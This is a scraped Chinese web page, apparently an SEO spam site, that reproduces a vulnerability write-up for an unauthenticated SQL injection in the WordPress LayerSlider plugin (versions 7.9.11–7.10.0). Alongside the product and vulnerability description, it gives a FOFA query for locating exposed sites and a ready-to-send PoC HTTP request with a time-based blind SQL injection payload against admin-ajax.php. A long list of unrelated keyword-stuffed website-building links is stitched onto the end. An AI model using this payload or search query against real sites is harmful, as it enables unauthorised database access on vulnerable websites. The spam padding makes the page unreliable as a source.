当前位置: 首页 > news >正文

白云做网站网站后台标签切换

白云做网站,网站后台标签切换,网站程可以自己做吗,筑巢网站建设怎么样0x01 产品简介 WordPress插件LayerSlider是一款可视化网页内容编辑器、图形设计软件和数字视觉效果应用程序,全球活跃安装量超过 1,000,000 次。 0x02 漏洞概述 WordPress LayerSlider插件版本7.9.11 – 7.10.0中,由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),…

0x01 产品简介

WordPress插件LayerSlider是一款可视化网页内容编辑器、图形设计软件和数字视觉效果应用程序,全球活跃安装量超过 1,000,000 次。

0x02 漏洞概述

WordPress LayerSlider插件版本7.9.11 – 7.10.0中,由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),可能导致通过 ls_get_popup_markup 操作受到SQL注入攻击,未经身份验证的威胁者可利用该漏洞从数据库中获取敏感信息。

0x03 影响范围

LayerSlider插件版本7.9.11 – 7.10.0

0x04 复现环境

FOFA:body="/wp-content/plugins/LayerSlider/"

0x05 漏洞复现

PoC

GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.
http://www.hyszgw.com/news/66804.html

相关文章:

  • 房地产做网站不wordpress重新发布
  • 设计接活的网站h5建站系统
  • 什么网站做微信公众账号精选聊城做网站的公司
  • ftp网站建设小程序开发公司哪家正规
  • 贵阳做网站软件公司网页制作收费标准
  • dede 后台 不能保存网站名称怎么查网站的备案
  • com网站免费注册网站临时会话
  • 营销型网站建设公司电话营销型网站建设模板
  • 定制网站建设公司电话音乐视频怎么做mp3下载网站
  • 网站建设功能需求分析网站运营需要 做哪些工作
  • 商务网站建设sz886免费网站建设品牌好
  • 网站建设结束语域名打不开网站
  • 申请中网可信网站泰安网签查询2023
  • wordpress建站上海佛山 详情公布
  • 搜索引擎中注册网站如何看一个大型网站的源代码
  • 可以做数理化的网站网站开发需要资质吗
  • 北京高端网站建设规划php可以做视频网站有哪些
  • 网站设计软件开发笨笨网站建设专家
  • 教做宝宝衣服的网站wordpress mysql端口
  • vue做单页面网站百度搜索量排名
  • 高校思政主题网站建设的意义.net网站程序
  • 蛋糕网站建设方案怎么开发一个网站项目
  • 农产品网站建设策划wordpress换域名换服务器
  • 金华建设技工学校网站网站建设代码好难啊
  • saas做视频网站做网站如何提需求
  • eclipse 网站开发教程soho 网站建设
  • 程序员能转行做网站维护不广州网站建设推广公司
  • 保险公司网站阿里云服务起做网站
  • 怎么使用网站服务器网站建设安全与维护
  • 小公司网站开发手机网站设置